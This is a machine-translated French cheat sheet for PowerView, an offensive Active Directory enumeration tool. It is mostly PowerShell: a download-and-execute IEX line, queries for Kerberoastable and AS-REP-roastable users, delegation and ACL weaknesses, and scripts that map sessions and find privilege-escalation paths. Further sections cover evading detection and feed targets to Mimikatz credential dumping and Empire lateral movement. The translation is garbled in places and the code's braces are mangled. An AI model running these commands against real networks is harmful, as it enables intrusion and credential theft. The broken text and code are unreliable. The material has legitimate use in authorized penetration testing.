PowerView Active Directory Enumeration Tool Cheat Sheet
Aperçu général
PowerView est une puissance Outil Shell développé par Will Schroeder (@harmj0y) dans le cadre de PowerSploy. Il est conçu pour le dénombrement et l'exploitation d'Active Directory, offrant une fonctionnalité étendue pour la reconnaissance de domaine, la découverte de chemin d'escalade de privilèges et l'identification de vecteurs d'attaque dans les environnements Windows.
C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Installation PowerSploit
# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"
# Import PowerView
Import-Module C:\Tools\PowerSploit-master\Recon\PowerView.ps1
# Alternative direct import
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
Puissance autonome Affichage
# Download standalone PowerView
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" -OutFile "PowerView.ps1"
# Import PowerView
Import-Module .\PowerView.ps1
# Or execute directly
. .\PowerView.ps1
```_
### Dev Branch (Dernières caractéristiques)
```powershell
# Download dev branch (more features)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1" -OutFile "PowerView-dev.ps1"
Import-Module .\PowerView-dev.ps1
```_
## Utilisation de base
### Chargement et aide du module
```powershell
# Import PowerView
Import-Module PowerView.ps1
# Get all PowerView commands
Get-Command -Module PowerView
# Get help for specific function
Get-Help Get-DomainUser -Full
# List all PowerView functions
Get-Command *-Domain*
Get-Command *-Net*
Informations de base sur le domaine
# Get current domain
Get-Domain
# Get domain controllers
Get-DomainController
# Get domain policy
Get-DomainPolicy
# Get domain trusts
Get-DomainTrust
# Get forest information
Get-Forest
Énumération des domaines
Énumération des utilisateurs
# Get all domain users
Get-DomainUser
# Get specific user
Get-DomainUser -Identity administrator
# Get users with specific properties
Get-DomainUser -Properties samaccountname,description,pwdlastset
# Get users with SPN set (Kerberoastable)
Get-DomainUser -SPN
# Get users with pre-authentication disabled (AS-REP Roastable)
Get-DomainUser -PreauthNotRequired
# Get privileged users
Get-DomainUser -AdminCount
# Get users with passwords not required
Get-DomainUser -PasswordNotRequired
Énumération des groupes
# Get all domain groups
Get-DomainGroup
# Get specific group
Get-DomainGroup -Identity "Domain Admins"
# Get group members
Get-DomainGroupMember -Identity "Domain Admins"
# Get groups for specific user
Get-DomainGroup -UserName administrator
# Get local groups on machines
Get-NetLocalGroup -ComputerName server01
# Get local group members
Get-NetLocalGroupMember -ComputerName server01 -GroupName Administrators
Énumération par ordinateur
# Get all domain computers
Get-DomainComputer
# Get computers with specific OS
Get-DomainComputer -OperatingSystem "*Server 2019*"
# Get computer properties
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp
# Get computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation
# Get computers with constrained delegation
Get-DomainComputer -TrustedToAuth
# Get domain controllers
Get-DomainComputer -Properties dnshostname|Where-Object \\\\{$_.dnshostname -like "*dc*"\\\\}
Nom du chef de service (SPN)
# Get all SPNs
Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname
# Get specific SPN types
Get-DomainUser -SPN|Where-Object \\\\{$_.serviceprincipalname -like "*SQL*"\\\\}
# Get SPNs for specific service
Get-DomainUser -SPN|Where-Object \\\\{$_.serviceprincipalname -like "*HTTP*"\\\\}
# Get unique SPN services
Get-DomainUser -SPN|ForEach-Object \\\\{$_.serviceprincipalname\\\\}|ForEach-Object \\\\{$_.split('/')[0]\\\\}|Sort-Object -Unique
Énumération des réseaux
Énumération des séances
# Get sessions on local machine
Get-NetSession
# Get sessions on remote machine
Get-NetSession -ComputerName server01
# Get sessions for all domain computers
Get-DomainComputer|ForEach-Object \\\\{Get-NetSession -ComputerName $_.dnshostname\\\\}
# Get logged on users
Get-NetLoggedon -ComputerName server01
# Get locally logged on users
Get-NetLoggedon -ComputerName server01 -LocalOnly
Énumération des parts
# Get shares on local machine
Get-NetShare
# Get shares on remote machine
Get-NetShare -ComputerName server01
# Get shares for all domain computers
Get-DomainComputer|ForEach-Object \\\\{Get-NetShare -ComputerName $_.dnshostname\\\\}
# Find interesting shares
Find-DomainShare
# Find readable shares
Find-DomainShare -CheckShareAccess
Énumération des processus
# Get processes on remote machine
Get-NetProcess -ComputerName server01
# Get processes for specific user
Get-NetProcess -ComputerName server01|Where-Object \\\\{$_.owner -like "*administrator*"\\\\}
# Get processes across domain
Get-DomainComputer|ForEach-Object \\\\{Get-NetProcess -ComputerName $_.dnshostname\\\\}
Contrôle de l'accès et autorisations
Énumération ACL
# Get ACLs for domain object
Get-DomainObjectAcl -Identity "Domain Admins"
# Get ACLs with specific rights
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
# Find interesting ACLs
Find-InterestingDomainAcl
# Get ACLs for specific user
Get-DomainObjectAcl -Identity administrator -ResolveGUIDs
# Find objects with specific ACE
Get-DomainObjectAcl|Where-Object \\\\{$_.SecurityIdentifier -eq "S-1-5-21-..."\\\\}
Analyse des autorisations
# Find objects modifiable by current user
Find-InterestingDomainAcl -ResolveGUIDs|Where-Object \\\\{$_.IdentityReferenceName -like "*$env:USERNAME*"\\\\}
# Find GenericAll permissions
Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*GenericAll*"\\\\}
# Find WriteDacl permissions
Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*WriteDacl*"\\\\}
# Find WriteOwner permissions
Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*WriteOwner*"\\\\}
Confiance et dénombrement des forêts
Analyse de la confiance dans le domaine
# Get domain trusts
Get-DomainTrust
# Get forest trusts
Get-ForestTrust
# Map domain trusts
Get-DomainTrustMapping
# Get external trusts
Get-DomainTrust -API|Where-Object \\\\{$_.trust_type -eq "TRUST_TYPE_EXTERNAL"\\\\}
# Get bidirectional trusts
Get-DomainTrust|Where-Object \\\\{$_.TrustDirection -eq "Bidirectional"\\\\}
Énumération transversale
# Enumerate users in trusted domain
Get-DomainUser -Domain trusted.domain.com
# Enumerate groups in trusted domain
Get-DomainGroup -Domain trusted.domain.com
# Get foreign group members
Get-DomainForeignGroupMember
# Get foreign users
Get-DomainForeignUser
Escalade des privilèges Voies
Accès administratif local
# Find local admin access
Find-LocalAdminAccess
# Test local admin access on specific machine
Test-AdminAccess -ComputerName server01
# Find machines where current user has local admin
Get-DomainComputer|ForEach-Object \\\\{Test-AdminAccess -ComputerName $_.dnshostname\\\\}
# Find machines where domain users have local admin
Find-DomainLocalGroupMember -GroupName Administrators
Analyse de délégation
# Find unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation
# Find constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# Find resource-based constrained delegation
Get-DomainComputer|Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ObjectAceType -eq "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity"\\\\}
Objectifs Kerberoasting
# Find Kerberoastable users
Get-DomainUser -SPN
# Get detailed Kerberoasting targets
Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname,pwdlastset,lastlogon
# Find high-value Kerberoasting targets
Get-DomainUser -SPN -AdminCount
# Find Kerberoastable users with old passwords
Get-DomainUser -SPN|Where-Object \\\\{$_.pwdlastset -lt (Get-Date).AddDays(-365)\\\\}
Découverte des vecteurs d'attaque
Sang Collecte de données
# Collect data for BloodHound (requires SharpHound)
# PowerView can supplement BloodHound data collection
# Get user sessions for BloodHound
Get-DomainComputer|ForEach-Object \\\\{
$computer = $_.dnshostname
$sessions = Get-NetSession -ComputerName $computer
foreach ($session in $sessions) \\\\{
[PSCustomObject]@\\\\{
Computer = $computer
User = $session.sesi10_username
Source = $session.sesi10_cname
\\\\}
\\\\}
\\\\}
Voies latérales
# Find computers with sessions from high-value users
$highValueUsers = Get-DomainGroupMember -Identity "Domain Admins"|Select-Object -ExpandProperty MemberName
Get-DomainComputer|ForEach-Object \\\\{
$computer = $_.dnshostname
$sessions = Get-NetLoggedon -ComputerName $computer
foreach ($session in $sessions) \\\\{
if ($highValueUsers -contains $session.wkui1_username) \\\\{
Write-Output "High-value user $($session.wkui1_username) logged on to $computer"
\\\\}
\\\\}
\\\\}
# Find shortest path to Domain Admins
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"
Techniques avancées de dénombrement
Demandes de renseignements LDAP
# Custom LDAP queries
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"
# Find users with specific attributes
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(description=*))"
# Find computers with specific OS
Get-DomainComputer -LDAPFilter "(&(objectCategory=computer)(operatingSystem=*Server*))"
# Find groups with specific names
Get-DomainGroup -LDAPFilter "(&(objectCategory=group)(name=*admin*))"
Énumération GPO
# Get all GPOs
Get-DomainGPO
# Get GPOs applied to specific OU
Get-DomainGPO -ComputerIdentity "OU=Servers,DC=domain,DC=com"
# Find interesting GPO settings
Get-DomainGPOLocalGroup
# Get GPO computer local group settings
Get-DomainGPOComputerLocalGroupMapping
# Find GPOs with specific settings
Get-DomainGPO|Where-Object \\\\{$_.displayname -like "*password*"\\\\}
OU et analyse des conteneurs
# Get all OUs
Get-DomainOU
# Get objects in specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=com"
# Get OU ACLs
Get-DomainOU|Get-DomainObjectAcl -ResolveGUIDs
# Find interesting OU permissions
Get-DomainOU|Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*GenericAll*"\\\\}
Vol et évacuation
Éviter la détection
# Use alternate credentials
$cred = Get-Credential
Get-DomainUser -Credential $cred
# Use specific domain controller
Get-DomainUser -Server dc02.domain.com
# Limit queries to avoid detection
Get-DomainUser -ResultPageSize 100
# Use LDAPS for encrypted queries
Get-DomainUser -Server dc01.domain.com -ServerTimeLimit 30
Énumération minimale des empreintes de pas
# Essential enumeration with minimal queries
$domain = Get-Domain
$domainAdmins = Get-DomainGroupMember -Identity "Domain Admins"
$spnUsers = Get-DomainUser -SPN
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem
# Targeted enumeration
$targetUsers = @("administrator", "service_account", "backup_admin")
foreach ($user in $targetUsers) \\\\{
Get-DomainUser -Identity $user
\\\\}
Automatisation et établissement de rapports
Évaluation globale des domaines
# Comprehensive domain assessment script
param(
[string]$OutputPath = "C:\Temp\DomainAssessment",
[string]$Domain = $env:USERDOMAIN
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting comprehensive domain assessment for $Domain"
# Domain information
Write-Host "[+] Gathering domain information..."
Get-Domain|Out-File "$OutputPath\domain_info.txt"
Get-DomainController|Out-File "$OutputPath\domain_controllers.txt"
Get-DomainTrust|Out-File "$OutputPath\domain_trusts.txt"
# User enumeration
Write-Host "[+] Enumerating users..."
Get-DomainUser|Export-Csv "$OutputPath\domain_users.csv" -NoTypeInformation
Get-DomainUser -SPN|Export-Csv "$OutputPath\spn_users.csv" -NoTypeInformation
Get-DomainUser -AdminCount|Export-Csv "$OutputPath\privileged_users.csv" -NoTypeInformation
# Group enumeration
Write-Host "[+] Enumerating groups..."
Get-DomainGroup|Export-Csv "$OutputPath\domain_groups.csv" -NoTypeInformation
Get-DomainGroupMember -Identity "Domain Admins"|Export-Csv "$OutputPath\domain_admins.csv" -NoTypeInformation
# Computer enumeration
Write-Host "[+] Enumerating computers..."
Get-DomainComputer|Export-Csv "$OutputPath\domain_computers.csv" -NoTypeInformation
Get-DomainComputer -UnconstrainedDelegation|Export-Csv "$OutputPath\unconstrained_delegation.csv" -NoTypeInformation
# Share enumeration
Write-Host "[+] Enumerating shares..."
Find-DomainShare|Export-Csv "$OutputPath\domain_shares.csv" -NoTypeInformation
# ACL analysis
Write-Host "[+] Analyzing ACLs..."
Find-InterestingDomainAcl -ResolveGUIDs|Export-Csv "$OutputPath\interesting_acls.csv" -NoTypeInformation
Write-Host "[+] Assessment complete. Results saved to $OutputPath"
Escalade des privilèges Découverte du sentier
# Privilege escalation path discovery script
param(
[string]$TargetUser = "administrator",
[string]$OutputPath = "C:\Temp\PrivEscPaths"
)
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Discovering privilege escalation paths to $TargetUser"
# Find local admin access
Write-Host "[+] Finding local admin access..."
$localAdminAccess = Find-LocalAdminAccess
$localAdminAccess|Out-File "$OutputPath\local_admin_access.txt"
# Find user sessions
Write-Host "[+] Finding user sessions..."
$userSessions = Get-DomainComputer|ForEach-Object \\\\{
$computer = $_.dnshostname
try \\\\{
$sessions = Get-NetSession -ComputerName $computer -ErrorAction SilentlyContinue
foreach ($session in $sessions) \\\\{
[PSCustomObject]@\\\\{
Computer = $computer
User = $session.sesi10_username
Source = $session.sesi10_cname
\\\\}
\\\\}
\\\\} catch \\\\{\\\\}
\\\\}
$userSessions|Export-Csv "$OutputPath\user_sessions.csv" -NoTypeInformation
# Find Kerberoastable users
Write-Host "[+] Finding Kerberoastable users..."
$kerberoastable = Get-DomainUser -SPN
$kerberoastable|Export-Csv "$OutputPath\kerberoastable_users.csv" -NoTypeInformation
# Find delegation opportunities
Write-Host "[+] Finding delegation opportunities..."
$delegation = @()
$delegation += Get-DomainComputer -UnconstrainedDelegation|Select-Object @\\\\{Name="Type";Expression=\\\\{"Unconstrained"\\\\}\\\\}, @\\\\{Name="Object";Expression=\\\\{$_.dnshostname\\\\}\\\\}
$delegation += Get-DomainUser -TrustedToAuth|Select-Object @\\\\{Name="Type";Expression=\\\\{"Constrained"\\\\}\\\\}, @\\\\{Name="Object";Expression=\\\\{$_.samaccountname\\\\}\\\\}
$delegation|Export-Csv "$OutputPath\delegation_opportunities.csv" -NoTypeInformation
Write-Host "[+] Privilege escalation path discovery complete"
Scénario de cartographie de réseau
# Network mapping script
param(
[string]$OutputPath = "C:\Temp\NetworkMapping"
)
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting network mapping"
# Get all computers
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem
# Map shares
Write-Host "[+] Mapping shares..."
$allShares = @()
foreach ($computer in $computers) \\\\{
try \\\\{
$shares = Get-NetShare -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
foreach ($share in $shares) \\\\{
$allShares += [PSCustomObject]@\\\\{
Computer = $computer.dnshostname
ShareName = $share.shi1_netname
ShareType = $share.shi1_type
Remark = $share.shi1_remark
\\\\}
\\\\}
\\\\} catch \\\\{\\\\}
\\\\}
$allShares|Export-Csv "$OutputPath\network_shares.csv" -NoTypeInformation
# Map sessions
Write-Host "[+] Mapping sessions..."
$allSessions = @()
foreach ($computer in $computers) \\\\{
try \\\\{
$sessions = Get-NetSession -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
foreach ($session in $sessions) \\\\{
$allSessions += [PSCustomObject]@\\\\{
Computer = $computer.dnshostname
User = $session.sesi10_username
Source = $session.sesi10_cname
Time = $session.sesi10_time
\\\\}
\\\\}
\\\\} catch \\\\{\\\\}
\\\\}
$allSessions|Export-Csv "$OutputPath\network_sessions.csv" -NoTypeInformation
Write-Host "[+] Network mapping complete"
Intégration avec d'autres outils
Intégration de BloodHound
# Supplement BloodHound data with PowerView
# Get additional session data
$sessions = Get-DomainComputer|ForEach-Object \\\\{
Get-NetSession -ComputerName $_.dnshostname
\\\\}
# Get additional local group data
$localGroups = Get-DomainComputer|ForEach-Object \\\\{
Get-NetLocalGroupMember -ComputerName $_.dnshostname -GroupName Administrators
\\\\}
# Export for BloodHound custom queries
$sessions|ConvertTo-Json|Out-File "bloodhound_sessions.json"
$localGroups|ConvertTo-Json|Out-File "bloodhound_localgroups.json"
Intégration Mimikatz
# Find targets for Mimikatz
$highValueSessions = Get-DomainComputer|ForEach-Object \\\\{
$computer = $_.dnshostname
$sessions = Get-NetLoggedon -ComputerName $computer
$sessions|Where-Object \\\\{$_.wkui1_username -in @("administrator", "domain admin", "enterprise admin")\\\\}
\\\\}
# Output targets for credential dumping
$highValueSessions|Select-Object Computer, User|Export-Csv "mimikatz_targets.csv" -NoTypeInformation
Intégration de l'Empire
# Generate target list for Empire
$targets = Find-LocalAdminAccess
$targets|ForEach-Object \\\\{
Write-Output "usemodule lateral_movement/invoke_psexec"
Write-Output "set ComputerName $_"
Write-Output "execute"
\\\\}
Dépannage
Questions communes
# LDAP query failures
# Check domain connectivity
Test-NetConnection -ComputerName (Get-Domain).PdcRoleOwner -Port 389
# Permission issues
# Check current user context
whoami /groups
# Network connectivity
# Test WMI access
Get-WmiObject -Class Win32_OperatingSystem -ComputerName server01
# DNS resolution
# Test name resolution
Resolve-DnsName domain.com
Mode de débogage
# Enable verbose output
$VerbosePreference = "Continue"
# Test specific functions
Get-DomainUser -Identity administrator -Verbose
# Check LDAP queries
Get-DomainUser -LDAPFilter "(samaccountname=administrator)" -Verbose
Meilleures pratiques
Sécurité opérationnelle
- Utiliser des comptes légitimes: éviter les comptes de services suspects
- Limiter les requêtes: Ne pas inonder les contrôleurs de domaines avec des requêtes
- Utiliser des cibles spécifiques: Cibler des objets spécifiques plutôt qu'un dénombrement large
- Clean up: Supprimer tout objet créé ou ACL modifié
- Logs de surveillance: Soyez conscient des événements de sécurité générés
Stratégie de dénombrement
# Phased approach
# Phase 1: Basic domain information
Get-Domain
Get-DomainController
# Phase 2: User and group enumeration
Get-DomainUser -Properties samaccountname,description
Get-DomainGroup -Properties samaccountname,description
# Phase 3: Privilege analysis
Get-DomainUser -AdminCount
Find-InterestingDomainAcl
# Phase 4: Attack vector identification
Get-DomainUser -SPN
Find-LocalAdminAccess
Ressources
- [PowerView GitHub Repository] (LINK_5)
- [Blogue de Harmj0y] (LINK_5)
- [Documentation sur le déploiement de puissance] (LINK_5)
- [Sécurité active du répertoire] (LINK_5)
- [SpecterOps Blog] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation de PowerView. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité Active Directory. *